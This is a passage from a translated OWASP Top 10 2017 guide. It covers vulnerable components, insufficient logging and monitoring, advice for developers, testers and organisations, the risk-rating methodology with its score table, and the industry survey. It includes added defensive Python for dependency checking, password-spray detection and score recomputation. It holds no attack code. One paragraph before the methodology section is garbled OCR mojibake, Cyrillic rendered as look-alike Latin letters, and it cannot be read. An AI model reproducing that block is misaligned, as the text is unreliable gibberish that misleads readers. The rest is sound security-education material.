• OWASP Cheat Sheet: Deserialization
• OWASP Proactive Controls: Validate All Inputs
• OWASP Application Security Verification Standard
• OWASP AppSecEU 2016: Surviving the Java Deserialization Apocalypse
• OWASP AppSecUSA 2017: Friday the 13th JSON Attacks

External

• CWE-502: Deserialization of Untrusted Data
• Java Unmarshaller Security
• OWASP AppSec Cali 2015: Marshalling Pickles
A9:2017 Using Components with Known Vulnerabilities

Threat agents / attack vectors: application specific. Exploitability: 2
Security weakness: Prevalence: 3. Detectability: 2
Impacts: Technical: 2. Business: ?

Attack vectors: Although ready-made exploits are easy to find for most known vulnerabilities, some of them require custom tooling to exploit.

Security weakness: This vulnerability is very widespread. Component-heavy development patterns can lead to teams not even knowing which components are actually used in the application or API. Some scanners, such as retire.js, can help detect vulnerable components, but determining whether they are exploitable takes additional effort.

Impacts: While not every vulnerability has serious consequences, some of the largest breaches were caused precisely by components with known vulnerabilities. Depending on the assets you protect, this threat may belong at the top of your list.


Is the application vulnerable?

The application is vulnerable if:

• you do not know the versions of all components in use (both client-side and server-side). This includes the components themselves and their nested dependencies;

• the software is vulnerable, unsupported or out of date. This includes the OS, web servers, application servers, DBMS, applications, APIs, and all components, runtime environments and libraries;

• vulnerability scanning is irregular and there is no subscription to security bulletins for the components in use;

• fixes or upgrades for the platforms, frameworks and dependencies in use are not installed promptly. This typically happens when updates are checked monthly or quarterly, leaving the organization with already-fixed vulnerabilities unpatched for weeks or months;

• developers do not test the compatibility of updated or patched libraries;

• the components' configurations are not secured (see A6:2017-Security Misconfiguration).


Example attack scenarios

Scenario #1: Components usually run with the privileges of the application, so a vulnerability in any component can have serious consequences. Such a vulnerability can be accidental (e.g., a coding error) or intentional (e.g., a backdoor). Some examples of exploitable vulnerabilities discovered in components:

• CVE-2017-5638, a Struts 2 vulnerability that allows arbitrary remote code execution on the server, has been blamed for several major breaches;

• vulnerabilities in Internet of Things (IoT) devices are often hard or impossible to patch, which can lead to serious consequences (for example, in biomedical devices).

There are automated tools that let attackers find vulnerable or misconfigured systems. For example, the Shodan IoT search engine can find devices that still have not been patched against the Heartbleed vulnerability, which was fixed in April 2014.


How to prevent

A patch management process must be in place:

• Remove unused dependencies as well as unnecessary features, components, files and documentation.

• Continuously check that the versions of client-side and server-side components (e.g., frameworks and libraries) and their dependencies are current, using tools such as versions, DependencyCheck, retire.js and similar. Monitor sources such as CVE and NVD for vulnerability news. Use software composition analysis tools to automate the process. Subscribe to security alerts for the components you use.

• Obtain components only from official sources over secure links. Prefer signed packages to reduce the risk of installing a modified or malicious component.

• Watch for libraries and components that are unmaintained or no longer receive security updates. If upgrading is impossible, consider a virtual patch to detect or prevent exploitation of the known vulnerability.

Every organization must ensure ongoing monitoring, triage and application of updates or configuration changes throughout the lifetime of the application or application portfolio.
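An added example (not one of the tools named above) of the inventory step in the process just described: compare the recorded versions of deployed components against affected-version ranges from an advisory feed. The inventory, the jquery entry and the Struts ranges are constructed for illustration and must be checked against the real advisories before use; the function names are this example's own:

```python
import re

# Constructed inventory of deployed components, as a patch-management process
# would record it; names and versions are illustrative.
INVENTORY = {
    "struts2-core": "2.3.20",
    "jquery": "3.3.1",
    "openssl": "1.0.1g",
}

# Constructed advisory feed. CVE-2017-5638 is the Struts 2 issue named in the
# scenarios above; its affected ranges are given here as illustration and must be
# confirmed against the vendor advisory. The second entry is a placeholder id.
ADVISORIES = [
    {"id": "CVE-2017-5638", "component": "struts2-core",
     "affected": [("2.3.5", "2.3.31"), ("2.5.0", "2.5.10")]},
    {"id": "CVE-XXXX-PLACEHOLDER", "component": "jquery",
     "affected": [("1.0.0", "3.3.0")]},
]


def version_key(version: str) -> tuple:
    """Turn '2.3.31' or '1.0.1g' into a comparable tuple: each dotted part compares
    numerically first, then by its letter suffix (OpenSSL style), so 1.0.1g > 1.0.1f
    and 2.3.31 > 2.3.5 (a plain string comparison would get the latter wrong)."""
    parts = []
    for piece in version.split("."):
        m = re.match(r"(\d+)([A-Za-z]*)$", piece)
        if not m:
            raise ValueError(f"unparseable version component: {piece!r}")
        parts.append((int(m.group(1)), m.group(2)))
    return tuple(parts)


def in_range(version: str, low: str, high: str) -> bool:
    """Inclusive range check; shorter tuples are padded with (0, '') so 2.5 == 2.5.0."""
    v, lo, hi = version_key(version), version_key(low), version_key(high)
    width = max(len(v), len(lo), len(hi))

    def pad(t: tuple) -> tuple:
        return t + ((0, ""),) * (width - len(t))

    return pad(lo) <= pad(v) <= pad(hi)


def find_known_vulnerable(inventory: dict, advisories: list) -> list:
    """Return [(component, version, advisory_id)] for every inventory entry that
    falls inside an advisory's affected range. Components missing from the
    inventory are never matched, which is why the inventory itself must be
    complete (the first bullet under "Is the application vulnerable?")."""
    findings = []
    for adv in advisories:
        installed = inventory.get(adv["component"])
        if installed is None:
            continue
        if any(in_range(installed, lo, hi) for lo, hi in adv["affected"]):
            findings.append((adv["component"], installed, adv["id"]))
    return findings
```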


References

OWASP

• OWASP Application Security Verification Standard: V1 Architecture, Design and Threat Modelling
• OWASP Dependency Check (for Java and .NET libraries)
• OWASP Testing Guide: Map Application Architecture (OTG-INFO-010)
• OWASP Virtual Patching Best Practices

External

• The Unfortunate Reality of Insecure Libraries
• MITRE Common Vulnerabilities and Exposures (CVE) search
• National Vulnerability Database (NVD)
• Retire.js for detecting known vulnerable JavaScript libraries
• Node Libraries Security Advisories
• Ruby Libraries Security Advisory Database and Tools
A10:2017 Insufficient Logging and Monitoring

Threat agents / attack vectors: application specific. Exploitability: 2
Security weakness: Prevalence: 3. Detectability: 1
Impacts: Technical: 2. Business: ?

Attack vectors: Exploitation of insufficient logging and monitoring is the bedrock of nearly every major breach. Attackers rely on the absence of monitoring and of timely incident response.

Security weakness: This issue is included in the Top 10 based on an industry survey. One way to judge the quality of monitoring is to examine the logs after a penetration test. The testers' actions should be recorded well enough to determine the damage they could have caused.

Impacts: Most attacks start with vulnerability probing. Allowing such probing to continue raises the probability of successful exploitation to nearly 100%. In 2016, detecting a breach took an average of 191 days; the damage done in that time could be enormous.


Is the application vulnerable?

Insufficient logging, attack detection, monitoring and incident response occur whenever:

• auditable events, such as successful and failed logins and high-value transactions, are not logged;

• warnings and errors are not logged, or are logged inadequately;

• application and API logs are not monitored for suspicious activity;

• logs are stored only locally;

• alerting thresholds and incident response escalation processes are absent or ineffective;

• penetration testing and scans by DAST tools (for example, OWASP ZAP) do not trigger alerts;

• the application is unable to detect, respond to or alert on attacks in real time or near real time.

The system leaks information if logs and alerts are visible to users or attackers (see A3:2017-Sensitive Data Exposure).


Example attack scenarios

Scenario #1: An open source project's forum, run by a small team, was hacked through a vulnerability in its software. The attackers wiped the internal repository containing the next version of the product, along with all of the forum's content. Although the source could be recovered, the lack of monitoring, logging and alerting led to a far worse breach. As a result of the incident, the software project behind the forum is no longer developed.

Scenario #2: An attacker can try a single common password against every account; for some accounts it may fit. For all the others only one failed login attempt is recorded. After a few days the attempt may be repeated with a different password.

Scenario #3: A large retail chain has a sandbox for internal analysis of malicious attachments. The sandbox detected potentially malicious software, but nobody paid attention to its alerts until the breach was discovered because of fraudulent bank card transactions reported by an external bank.


How to prevent

Depending on the criticality of the data stored or processed by the application:

• log all login, access control and server-side input validation failures with enough context to identify suspicious or malicious activity, and retain them for later analysis;

• log events in a format that a centralized log management service can easily consume;

• apply integrity controls to the audit logs of high-value transactions to prevent tampering or deletion, for example with append-only database tables;

• use effective monitoring and alerting systems so that suspicious activity is detected and responded to in a timely manner;

• establish or adopt an incident response and recovery plan, such as NIST 800-61 rev2.

There are commercial and free application protection systems (for example, OWASP AppSensor), web application firewalls (for example, ModSecurity with the OWASP ModSecurity Core Rule Set), and log correlation software with configurable dashboards and alerting.
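An added example (not OWASP AppSensor or any tool named above) of detection logic for the Scenario #2 pattern, run over a constructed server-side login log in the key=value shape the first two bullets call for. The log lines, addresses, user names and function names are this example's own:

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed auth log. Each failed login carries the context needed to identify
# suspicious activity (user, source) and is one line a central log service can
# ingest. 203.0.113.7 is Scenario #2: one password tried against many accounts,
# leaving a single failed attempt per account.
SAMPLE_LOG = """\
2017-10-20T10:00:01Z event=login_failed user=alice src=203.0.113.7
2017-10-20T10:00:02Z event=login_failed user=bob src=203.0.113.7
2017-10-20T10:00:03Z event=login_failed user=carol src=203.0.113.7
2017-10-20T10:00:04Z event=login_ok user=dave src=198.51.100.5
2017-10-20T10:00:05Z event=login_failed user=dave src=203.0.113.7
2017-10-20T10:00:06Z event=login_failed user=erin src=203.0.113.7
2017-10-20T10:00:07Z event=login_ok user=frank src=203.0.113.7
2017-10-20T10:00:40Z event=login_failed user=alice src=198.51.100.5
2017-10-20T10:00:41Z event=login_failed user=alice src=198.51.100.5
"""


def parse_line(line: str) -> dict:
    """'<timestamp> k=v k=v ...' -> dict with a parsed 'ts'; raises on a bad timestamp."""
    ts_text, *fields = line.split()
    record = {"ts": datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")}
    for field in fields:
        key, _, value = field.partition("=")
        record[key] = value
    return record


def detect_password_spray(log_text: str, min_accounts: int = 5,
                          window: timedelta = timedelta(minutes=10)) -> list:
    """Alert when one source fails logins against at least min_accounts distinct
    users inside a sliding window. A per-account lockout threshold never fires on
    this pattern, because each account sees only one failure; correlating the
    failures by source does."""
    recent = defaultdict(deque)   # src -> deque of (ts, user) within the window
    alerted = set()               # one alert per source per run
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec.get("event") != "login_failed":
            continue
        src, ts = rec["src"], rec["ts"]
        q = recent[src]
        q.append((ts, rec["user"]))
        while q and ts - q[0][0] > window:
            q.popleft()
        users = {u for _, u in q}
        if len(users) >= min_accounts and src not in alerted:
            alerted.add(src)
            alerts.append({"src": src, "first_seen": q[0][0], "last_seen": ts,
                           "accounts": sorted(users)})
    return alerts
```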

References

OWASP

• OWASP Proactive Controls: Implement Logging and Intrusion Detection
• OWASP Application Security Verification Standard: V8 Logging and Monitoring
• OWASP Testing Guide: Testing for Detailed Error Code
• OWASP Cheat Sheet: Logging

External

• CWE-223: Omission of Security-relevant Information
• CWE-778: Insufficient Logging
What's next for developers

Establish and use repeatable security processes and standard security controls

Whether you are new to web application security or already familiar with its problems, building a secure web application or fixing the vulnerabilities in an existing one can be a difficult task. With a large application portfolio it can seem impossible.

To help organizations and developers reduce application security risks cost-effectively, OWASP has produced many free and open resources. Below are some OWASP solutions that help organizations build secure web applications and APIs. The next page presents additional OWASP resources for verifying the security of applications and APIs.

Application security requirements: To build a secure web application, you must first define its security requirements. OWASP recommends the OWASP Application Security Verification Standard (ASVS) for this purpose. When outsourcing, use the OWASP Secure Software Contract Annex. Note: the annex applies to US contract law; consult a lawyer before using it.

Application security architecture: Rather than retrofitting security mechanisms into finished applications and APIs, it is far more cost-effective to build them in during development. OWASP recommends the OWASP Cheat Sheets as guidance for designing a secure application from scratch.

Standard security controls: Building strong and usable security controls is difficult. Using standard controls greatly simplifies the development of secure applications and APIs. The OWASP Proactive Controls is a good guide for developers, and many frameworks now provide standard controls for authorization, CSRF protection and so on.

Secure development lifecycle: To improve the process by which applications and APIs are built, OWASP recommends the OWASP Software Assurance Maturity Model (SAMM), which helps an organization develop and implement a software security methodology tailored to its own needs.

Application security education: The OWASP Education Project provides materials for training developers in web application security. For hands-on practice, use OWASP WebGoat, WebGoat.NET, OWASP NodeJS Goat, OWASP Juice Shop or the OWASP Broken Web Applications Project. To stay current, attend OWASP AppSec conferences, training, or local OWASP chapter meetings.

There are many additional OWASP resources. Visit the OWASP Projects page, where the Project Inventory tab lists the Flagship, Labs and Incubator projects. Most OWASP resources are available on our wiki, and many OWASP documents can be ordered in hardcopy or as e-books.
What's next for testers

Establish continuous application security testing

Writing secure code is important, but verifying that the controls you built are implemented correctly and used everywhere they should be is even more important. Application security testing exists for exactly this purpose. The task is difficult and complex. Modern development methods, such as Agile and DevOps, put heavy pressure on traditional approaches and tools, so we strongly recommend that you decide which components of your applications are critical and choose cost-effective methods for dealing with them.

Modern threats evolve quickly, so a single scan or penetration test of an application per year is no longer enough. Modern development requires security testing throughout the entire development lifecycle. Try to improve the process through security automation. Also consider the annual cost of testing, triage, remediation, retesting and redeploying an application, multiplied by the number of applications you support.

Understand the threat model: Before you start testing, make sure you have set priorities correctly based on the threat model. If you have no threat model, build one. Use the OWASP Application Security Verification Standard (ASVS) and the OWASP Testing Guide for this. Do not rely on vendor tools to decide which components are critical to your business.

Understand the development lifecycle: Your approach to application security testing must fit the team, processes and tools used throughout the software development lifecycle. Adding extra steps, gates and reviews can cause friction, attempts to bypass them, and reluctance to scale. Look for natural opportunities to gather security data and feed it into your processes.

Testing strategies: Choose the simplest, fastest and most accurate way to verify each requirement. Use the OWASP Security Knowledge Framework and the OWASP Application Security Verification Standard to define functional and non-functional security requirements and to carry out integration testing. Do not forget the people who will have to deal with the false positives and false negatives of automated tools.

Coverage and accuracy: You do not have to test everything at once. Start with what matters most and gradually expand the verification program, i.e. increase the number of automated security and vulnerability checks as well as the number of applications and APIs covered. The goal is a state in which the essential security properties of all applications and APIs are verified continuously.

Communicate findings clearly: No matter how well the testing was done, it is useless if you cannot communicate the results competently. Build trust by showing that you understand how the application works. Describe attack methods and scenarios clearly and without jargon. Give a realistic estimate of how hard the vulnerability is to discover and exploit, and how serious the consequences are. Finally, deliver findings through the tools development teams already use, not in PDF files.
What's next for organizations

Start your application security program now

Application security is no longer optional. Under pressure from regulators and a growing number of attacks, organizations must develop effective processes and controls for securing their applications and APIs. Many organizations are struggling to cope with the huge number of vulnerabilities in the enormous volume of code of applications and APIs already in production.

OWASP recommends establishing an application security program to assess and improve the security of applications and APIs. Security requires effective cooperation between different parts of the organization, including auditors, developers, managers and administrators. Security should be visible and measurable, so that the security posture of applications can be seen and understood. Focus on the work and results that actually improve security and eliminate or reduce risk. The OWASP Software Assurance Maturity Model and the OWASP Application Security Guide for CISOs contain most of the key activities in this list.

Integrate security into existing processes:

• Define and integrate secure implementation and verification activities into existing development and operations processes. The work includes threat modelling, secure design and design review, secure coding and code review, penetration testing and remediation.

• To succeed, provide subject matter experts and support services for developers and project teams.

Provide management visibility:

• Manage with metrics. Make improvement and funding decisions based on metrics and analytics data. Metrics should reflect security controls and practices, vulnerabilities found and fixed, application coverage, defect descriptions by type and count, and so on.

• Analyze implementation and verification data to look for root causes and vulnerability patterns when making strategic and systemic improvements across the company. Learn from mistakes and offer incentives to promote improvement.
Managing the application lifecycle

Applications are among the most complex systems that people constantly create and maintain. Application administration must be entrusted to IT specialists who are responsible for the entire application lifecycle. We suggest appointing application managers who are responsible for the technical aspects of the application throughout its lifecycle, from requirements gathering to decommissioning, which is so often forgotten.

Requirements and resource management

• Collect and negotiate with the business owner the business requirements for the application, including protection of the confidentiality, authenticity, integrity and availability of all information assets, as well as the expected business logic.

• Compile the technical requirements, including functional and non-functional security requirements.

• Plan and negotiate a budget covering all aspects of design, build, testing and operation, as well as security work.

Request for proposals and contracting

Negotiate the requirements with internal and external developers, including the guidelines and requirements of your security program, e.g., secure development lifecycle recommendations. Rate the fulfilment of all technical requirements, including planning and design.

Negotiate all technical requirements, including design, security and warranty obligations. Use templates and checklists, such as the OWASP Secure Software Contract Annex. Note: the annex applies to US contract law; consult a lawyer before using it.

Planning and design

Discuss plans and designs with the developers and internal partners, for example security specialists.

Define the security architecture, controls and countermeasures appropriate to the protection requirements and the expected threat level. This should be supported by security specialists.

Make sure the application owner accepts the remaining risks or provides additional resources.

In each sprint, ensure that security stories are created that include the constraints added for non-functional requirements.

Deployment, testing and rollout

• Automate the secure deployment of the application, its interfaces and components, as well as obtaining the required authorizations.

• Test the technical capabilities and the integration with the IT architecture, and organize business testing.

• Test "normal" and "abnormal" use of technical and production capabilities.

• Organize security testing according to internal processes, protection requirements and the expected threat level for each application.

• Put the application into operation and stop using old applications where necessary.

• Finalize all documentation, including the change management database and the security architecture.
Operations and change management

Operations must include application security management (for example, patch management).

Raise users' security awareness and find the right compromise between usability and security.

Plan and carry out modifications, such as moving to a new version of the application or using other components (OS, software or libraries).

Update the documentation, including change management documentation, the security architecture, controls and countermeasures, and documentation on current tasks or projects.
Retiring systems

• All important data must be archived; the rest must be securely deleted.

• Securely decommission the application, including deleting unused accounts, roles and permissions.

• Set the application's status to "retired" in the change management database.
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CTeneHb onacHOCTu y^SBHMOCTew 

MeTOAMKa oueHKM CTeneHM onacHOCTM yn3BMM0CTeM p,nn cnMCxa Ton-10 ocHOBaHa Ha MeTOAMxe oueHKM pmckob QWASP . 
flrm KaxAO m xaTeropMM yrpo3 oueHMBanMCbxapaxTepHbie p,nn CTaHAapTHoro Be6-npnnoxeHnn HeAOCTaTKM, i/icxo ah m 3 
cjDaKTopoB mx BepomHOCTM m pMCxa. 3aieM yrpo3bi rpynnMpoBanMCb no cieneHM onacHOCTM Be6-npnnoxeHHM. CnMCOx 
yn3BMM0deM oOHOBnneTcn c KaxAbiM HOBbiM BbinycKOM Ton-10, no Mepe M3MeHeHMn cpeAbi m ycnoBMM axcnnyaTauMM. 

MeTOAMKa OLieHKM pncKOB QWASP onncbiBaeT MHOxecTBO cfcaxTopoB, noMoratOLAMx opeHMTb onacHOdb oOHapyxeHHOM 
yn3BMM0CTM. Ton-10 npeAOCTaBnnemMLiJb o6o6LAeHHbie AaHHbie, a He MHc})opMauMK) o KOHKpeTHbix yn3BMM0cmx b 
peanbHbix npnnoxeHMnx m API. riosTOMy hmkto KpoMe BnaAenbija mam MeHeAxepa npMnoxeHMn He CMOxeT tohho opeHMTb 
pncKM, yrpoxaK)LAMe KOHKpeTHOMy npnnoxeHMK). TonbKO Bbi oOnaAaeie HanOonee nonHbiMM 3H3HMHMM, HToObi cyAMTb o 
kpmtmhhoctm BawMX npMnoxeHMM m AaHHbix, HanMHMM B03MOXHbixyrpo3, a Taxxe npMHUMnax paOoTbi m Mcnonb30BaHMn 
BaLUeM CMCTeMbl. 

Our methodology defines three likelihood factors for the presence of a vulnerability (prevalence, detectability and ease of exploitation) and one impact factor (technical impact). The level of each factor is rated from 1 (low) to 3 (high) and described by factor-specific terms. Prevalence, as a rule, does not need to be calculated: prevalence statistics provided by organizations (see Acknowledgements on p. 24) were processed and integrated into the Top 10 list. These data were then combined with the other two likelihood factors (detectability and ease of exploitation) to calculate the likelihood of each vulnerability being present. The resulting value was multiplied by the average technical impact to determine the overall risk of each item in the Top 10 list (the higher the result, the higher the risk). Detectability, ease of exploitation and impact were calculated on the basis of the CVEs associated with each Top 10 category.

Note: this approach does not take threat agents into account, nor the technical specifics of individual applications. Either of these factors can significantly affect the overall likelihood of an attacker discovering and exploiting a vulnerability. The rating also does not take the actual business impact into account. Each organization must decide for itself how much risk from its applications and APIs it is willing to accept, considering its established practices, its industry and its regulatory environment. Analyzing the risks of a specific organization is not among the objectives of the OWASP Top 10.

Below is the risk rating calculation for A6:2017-Security Misconfiguration.
Top 10 risk factor summary

The table below summarizes the 2017 Top 10 application security risks and the risk factors assigned to each of them. These factors were determined from the available statistics and the experience of the OWASP Top 10 team. To calculate the risks for a specific application or organization, you need to identify the threat agents and business impacts specific to it. Even critical weaknesses may not pose a serious risk if there are no threat agents or if the business impact is negligible for the assets in question.


Risk | Threat agents | Exploitability (attack vectors) | Prevalence (security weakness) | Detectability (security weakness) | Technical impact | Business impact | Score
A1:2017-Injection | App specific | EASY: 3 | COMMON: 2 | EASY: 3 | SEVERE: 3 | App specific | 8.0
A2:2017-Broken Authentication | App specific | EASY: 3 | COMMON: 2 | AVERAGE: 2 | SEVERE: 3 | App specific | 7.0
A3:2017-Sensitive Data Exposure | App specific | AVERAGE: 2 | WIDESPREAD: 3 | AVERAGE: 2 | SEVERE: 3 | App specific | 7.0
A4:2017-XML External Entities (XXE) | App specific | AVERAGE: 2 | COMMON: 2 | EASY: 3 | SEVERE: 3 | App specific | 7.0
A5:2017-Broken Access Control | App specific | AVERAGE: 2 | COMMON: 2 | AVERAGE: 2 | SEVERE: 3 | App specific | 6.0
A6:2017-Security Misconfiguration | App specific | EASY: 3 | WIDESPREAD: 3 | EASY: 3 | MODERATE: 2 | App specific | 6.0
A7:2017-Cross-Site Scripting (XSS) | App specific | EASY: 3 | WIDESPREAD: 3 | EASY: 3 | MODERATE: 2 | App specific | 6.0
A8:2017-Insecure Deserialization | App specific | DIFFICULT: 1 | COMMON: 2 | AVERAGE: 2 | SEVERE: 3 | App specific | 5.0
A9:2017-Vulnerable Components | App specific | AVERAGE: 2 | WIDESPREAD: 3 | AVERAGE: 2 | MODERATE: 2 | App specific | 4.7
A10:2017-Insufficient Logging and Monitoring | App specific | AVERAGE: 2 | WIDESPREAD: 3 | DIFFICULT: 1 | MODERATE: 2 | App specific | 4.0

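The rating rule from the methodology section (the average of the three likelihood factors multiplied by the technical impact) can be checked directly against the summary table. The Python below is an added example and not part of the OWASP document: it transcribes the factor values from the table, recomputes every score, and prints the worked calculation for A6:2017-Security Misconfiguration that the text refers to. The labels UNCOMMON and MINOR for factor value 1 do not appear in the table and are assumed from the OWASP Risk Rating terminology.

```python
"""Added example (not from the OWASP document): recompute the Top 10 2017 risk
scores from the factor table using the rule stated in the methodology:

    score = mean(exploitability, prevalence, detectability) * technical_impact

Each factor is on the 1 (low) .. 3 (high) scale described in the text.
"""
from dataclasses import dataclass

SCALE = (1, 2, 3)

# Factor-specific terminology on the 1..3 scale. The labels for value 1 of
# prevalence and impact are not shown in the table and are assumed here.
EXPLOITABILITY = {1: "DIFFICULT", 2: "AVERAGE", 3: "EASY"}
PREVALENCE = {1: "UNCOMMON", 2: "COMMON", 3: "WIDESPREAD"}
DETECTABILITY = {1: "DIFFICULT", 2: "AVERAGE", 3: "EASY"}
IMPACT = {1: "MINOR", 2: "MODERATE", 3: "SEVERE"}


@dataclass(frozen=True)
class RiskFactors:
    category: str
    exploitability: int
    prevalence: int
    detectability: int
    impact: int

    def __post_init__(self) -> None:
        # Reject values outside the 1..3 scale before any calculation.
        for name in ("exploitability", "prevalence", "detectability", "impact"):
            value = getattr(self, name)
            if value not in SCALE:
                raise ValueError(f"{name} must be 1, 2 or 3, got {value!r}")

    def likelihood(self) -> float:
        """Average of the three likelihood factors."""
        return (self.exploitability + self.prevalence + self.detectability) / 3

    def score(self) -> float:
        """Likelihood times technical impact, rounded to one decimal as in the table."""
        return round(self.likelihood() * self.impact, 1)

    def worked_calculation(self) -> str:
        """Readable trace of the calculation, e.g. the one the text gives for A6:2017."""
        return (
            f"{self.category}: ({self.exploitability} + {self.prevalence} + "
            f"{self.detectability}) / 3 = {self.likelihood():.2f}; "
            f"{self.likelihood():.2f} x {self.impact} = {self.score()}"
        )


# Factor values transcribed from the summary table on this page.
TOP10_2017 = [
    RiskFactors("A1:2017-Injection", 3, 2, 3, 3),
    RiskFactors("A2:2017-Broken Authentication", 3, 2, 2, 3),
    RiskFactors("A3:2017-Sensitive Data Exposure", 2, 3, 2, 3),
    RiskFactors("A4:2017-XML External Entities (XXE)", 2, 2, 3, 3),
    RiskFactors("A5:2017-Broken Access Control", 2, 2, 2, 3),
    RiskFactors("A6:2017-Security Misconfiguration", 3, 3, 3, 2),
    RiskFactors("A7:2017-Cross-Site Scripting (XSS)", 3, 3, 3, 2),
    RiskFactors("A8:2017-Insecure Deserialization", 1, 2, 2, 3),
    RiskFactors("A9:2017-Vulnerable Components", 2, 3, 2, 2),
    RiskFactors("A10:2017-Insufficient Logging and Monitoring", 2, 3, 1, 2),
]


def scores(items=TOP10_2017) -> dict:
    """Map each category name to its computed score."""
    return {r.category: r.score() for r in items}


def ranked(items=TOP10_2017) -> list:
    """Category names by descending score; ties keep input order (sorted is stable)."""
    return [r.category for r in sorted(items, key=lambda r: r.score(), reverse=True)]


if __name__ == "__main__":
    for r in TOP10_2017:
        print(r.worked_calculation())
```

Running the block prints one line per category; the A6 line reads "(3 + 3 + 3) / 3 = 3.00; 3.00 x 2 = 6.0", and the recomputed scores and ordering match the table's Score column, including the 4.7 for A9.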

Additional risks requiring attention

Besides the risks presented in the Top 10, there are other risks that need to be assessed and considered. Some of them were described in previous versions of the Top 10 and some were not, including new attack techniques that appear constantly. Listed below are additional application security risks (by CWE number) that also deserve attention:

• CWE-352: Cross-Site Request Forgery (CSRF)

• CWE-400: Uncontrolled resource consumption ("excessive resource consumption", "application denial of service")

• CWE-434: Unrestricted upload of files of a dangerous type

• CWE-451: Incorrect presentation of critical information by the user interface (UI/cursor spoofing and similar)

• CWE-601: Redirection to an unsafe site ("open redirect")

• CWE-799: Improper control of interaction frequency (anti-automation)

• CWE-829: Inclusion of functionality from untrusted sources (third-party content)

• CWE-918: Server-Side Request Forgery (SSRF)
Overview

At the OWASP summit, active participants and community members decided on a vulnerability-based view, on two forward-looking vulnerability classes, and on classifying vulnerabilities on the basis of quantitative and qualitative data.


Industry survey

For the survey, we selected the vulnerability categories that had previously been considered candidates or had been mentioned in feedback on 2017 RC1 on the Top 10 mailing list. We organized these data and asked the community to pick the top four vulnerabilities that deserve inclusion in the OWASP Top 10 2017. The survey ran from August 2 to September 18, 2017. 516 responses were received, and the criticality of the vulnerabilities was determined from them.


Criticality | Vulnerability category according to the survey | Score
1 | Exposure of confidential data (privacy violation) [CWE-359] | 748
2 | Encryption-related vulnerabilities [CWE-310/311/312/326/327] | 584
3 | Deserialization of untrusted data [CWE-502] | 514
4 | Authorization bypass through a user-controlled key (insecure direct object references and path manipulation) [CWE-639] | 493
5 | Insufficient logging and monitoring [CWE-223 / CWE-778] | 440


Exposure of private information was without doubt the most critical vulnerability, but it only supplements the existing category A3:2017-Sensitive Data Exposure. Encryption-related vulnerabilities can be placed there as well. Insecure deserialization was third according to the survey, so after its risk was rated it was added to the Top 10 as category A8:2017-Insecure Deserialization. Fourth were vulnerabilities related to user-controlled keys, which were included in the list under category A5:2017-Broken Access Control. It is good to see the survey rank these vulnerabilities highly, since there is not much data on them. Fifth in the list were insufficient logging and monitoring, which completed the Top 10 as category A10:2017-Insufficient Logging and Monitoring. The time has come when an application must be able to detect attacks, log the related events, and issue alerts and respond to them.

Public data call

Traditionally, data were collected and analyzed on the basis of frequency: how many vulnerabilities were found in applications. It is well known that automated tools report every instance of the same vulnerability they find, while specialists report a single vulnerability found under different conditions. This makes it difficult to combine the two approaches in analysis.

For the 2017 version, the vulnerability rate was calculated from the number of applications having one or more vulnerabilities of a given type. Most data were provided in two forms: the traditional frequency form, counting every instance of a vulnerability found, and a non-traditional form, counting the applications in which the vulnerability was found (one or more times). While not perfect, this approach allows comparing data obtained by specialists with the help of specialized tools with data obtained by specialized tools with specialist participation. The raw data and analysis results are available on GitHub. For future Top 10 versions, an additional structure intended for these purposes is planned.

In response to the call for data, 40+ data sets were received. Most of them were identical to those received in the initial collection (based on the frequency approach), so we used data only from 23 sources covering ~114 thousand applications. Where possible, one year of data from one source was taken. Most applications are unique, although applications may repeat across Veracode's yearly data. The data from the 23 sets were divided into those obtained by specialists using specialized tools and vulnerability rates obtained by tools with specialist participation. We calculated the percentage of applications containing each vulnerability type. The vulnerability rate was used to calculate prevalence when rating risk to determine the criticality of vulnerabilities in the Top 10 list.
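The difference between the two counting styles described above (every instance versus the share of applications with at least one finding) is easiest to see on concrete data. The Python below is an added example and not part of the OWASP document or its analysis scripts: the findings, application ids and counts are constructed for illustration (the CWE ids are real), and it shows how one application with many repeated scanner hits dominates a frequency count but not the per-application incidence rate.

```python
"""Added example (not from the OWASP document): frequency counting versus the
per-application incidence rate used for the 2017 prevalence data.

A scanner reports every instance of a weakness; a human tester tends to report
a weakness once per application. Counting instances lets a single noisy
application dominate, while the incidence rate (share of applications with at
least one finding of a type) counts each application once.
"""
from collections import Counter, defaultdict

# Constructed sample data: (application id, CWE id). Applications and counts
# are invented for illustration; CWE-79, CWE-89 and CWE-502 are real CWE ids.
FINDINGS = [
    ("app-1", "CWE-79"), ("app-1", "CWE-79"), ("app-1", "CWE-79"),
    ("app-1", "CWE-79"), ("app-1", "CWE-79"),   # one app with many XSS instances
    ("app-2", "CWE-79"),
    ("app-1", "CWE-89"), ("app-3", "CWE-89"), ("app-4", "CWE-89"),
    ("app-2", "CWE-502"),
]
TOTAL_APPS = 4   # every application in the data set, including ones with no findings


def frequency(findings):
    """Traditional view: number of reported instances per CWE."""
    return dict(Counter(cwe for _, cwe in findings))


def incidence(findings, total_apps):
    """2017 view: fraction of applications with at least one finding per CWE."""
    if total_apps <= 0:
        raise ValueError("total_apps must be positive")
    apps_by_cwe = defaultdict(set)
    for app, cwe in findings:
        apps_by_cwe[cwe].add(app)      # a set, so repeats within one app count once
    return {cwe: len(apps) / total_apps for cwe, apps in apps_by_cwe.items()}


def rank(metric):
    """CWE ids ordered by descending metric value; ties broken by CWE id."""
    return [cwe for cwe, _ in sorted(metric.items(), key=lambda kv: (-kv[1], kv[0]))]


if __name__ == "__main__":
    freq, inc = frequency(FINDINGS), incidence(FINDINGS, TOTAL_APPS)
    for cwe in sorted(freq):
        print(f"{cwe}: {freq[cwe]} instances, incidence {inc[cwe]:.0%}")
    print("by frequency:", rank(freq))
    print("by incidence:", rank(inc))
```

On this sample, frequency ranks CWE-79 first (6 instances, 5 of them from one application) while incidence ranks CWE-89 first (present in 3 of 4 applications), which is the distortion the per-application rate was adopted to avoid.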
Organizations that provided data

We would like to thank the organizations that provided their vulnerability data for the release of the updated 2017 version:


• ANCAP

• Aspect Security

• AsTech Consulting

• Atos

• Branding Brand

• Bugcrowd

• BUGemot

• CDAC

• Checkmarx

• Colegio LaSalle Monteria

• Company.com

• ContextIS

• Contrast Security

• DDoS.com

• Derek Weeks

• Easybss

• Edgescan

• EVRY

• EZI

• Hamed

• Hidden

• I4 Consulting

• iBLISS Segurança & Inteligencia

• ITsec Security Services bv

• Khallagh

• Linden Lab

